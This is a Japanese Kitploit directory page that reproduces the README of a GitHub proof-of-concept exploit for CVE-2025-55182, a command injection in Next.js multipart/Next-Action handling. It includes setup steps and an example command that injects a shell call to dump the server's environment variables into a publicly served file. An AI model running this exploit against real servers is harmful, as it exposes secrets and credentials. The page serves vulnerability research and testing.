Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182 — CVE-2025-55182を標的とした概念実証エクスプロイト。Next.jsのmultipart/Next-Action処理におけるローカルコマンドインジェクションのデモスクリプト。 | Kitploit
ツール/GitHubGitHub/youneszddz/cve-2025-55182
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubyouneszddz/cve-2025-55182

CVE-2025-55182

CVE-2025-55182を標的とした概念実証エクスプロイト。Next.jsのmultipart/Next-Action処理におけるローカルコマンドインジェクションのデモスクリプト。

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 Next.js POC

この小さなリポジトリには以下が含まれています:

  • test-app/: Next.js 16 (React 19) のテストアプリケーションで、App Router を使用しています。
  • exploit.js: マルチパート/Next-Action ハンドリングに関するサーバーの動作をデモおよびテストするためのローカルな概念実証スクリプトです。ローカルテストのみを目的としています。

リポジトリ構造

root@kitploit:~
rsc-test-app/
├─ README.md                # You are here
├─ exploit.js               # PoC script (local-only)
└─ test-app/                # Next.js application
   ├─ app/                  # App Router pages
   ├─ public/               # Static assets (and env.txt when generated)
   ├─ package.json          # Next 16 / React 19
   └─ README.md             # Default Next.js template README

前提条件

  • Node.js 18+ 推奨(Node 22 でテスト済み)
  • npm(またはお好みのパッケージマネージャー)

はじめに(Next.js アプリ)

  1. 依存関係をインストール:
root@kitploit:~
cd test-app
npm install
  1. 開発サーバーを起動:
root@kitploit:~
npm run dev
# App will be available at http://localhost:3000
  1. ビルドして起動(本番環境):
root@kitploit:~
npm run build
npm start

ローカル PoC スクリプト: exploit.js

このスクリプトは、Next-Action ヘッダー付きのマルチパートリクエストを作成し、サーバーの動作をテストします。デフォルトでは、サーバープロセス上で環境変数を public/env.txt に書き込むコマンドを実行しようとします(ローカル/開発環境でのデモンストレーション用)。

重要な注意事項:

  • これはローカルテストのみを目的としています。自分が所有していないシステムやテスト許可がないシステムには使用しないでください。
  • このスクリプトは、サーバーの作業ディレクトリが public/ が test-app/public/ の下に解決されるように設定されていることを前提としています。

使用方法

別のターミナルで、Next.js アプリが http://localhost:3000 で動作していることを確認してください:

root@kitploit:~
cd test-app
npm run dev

リポジトリのルートからスクリプトを実行します:

root@kitploit:~
node exploit.js http://localhost:3000 "sh -lc 'printenv > public/env.txt'"

パラメータ:

  • ベース URL(オプション): デフォルトは http://localhost:3000
  • コマンド(オプション): デフォルトは sh -lc 'printenv > public/env.txt'

実行後、生成されたファイルにアクセスして確認してください:

root@kitploit:~
http://localhost:3000/env.txt

すると、サーバーの環境変数が表示されます。

ツールをダウンロード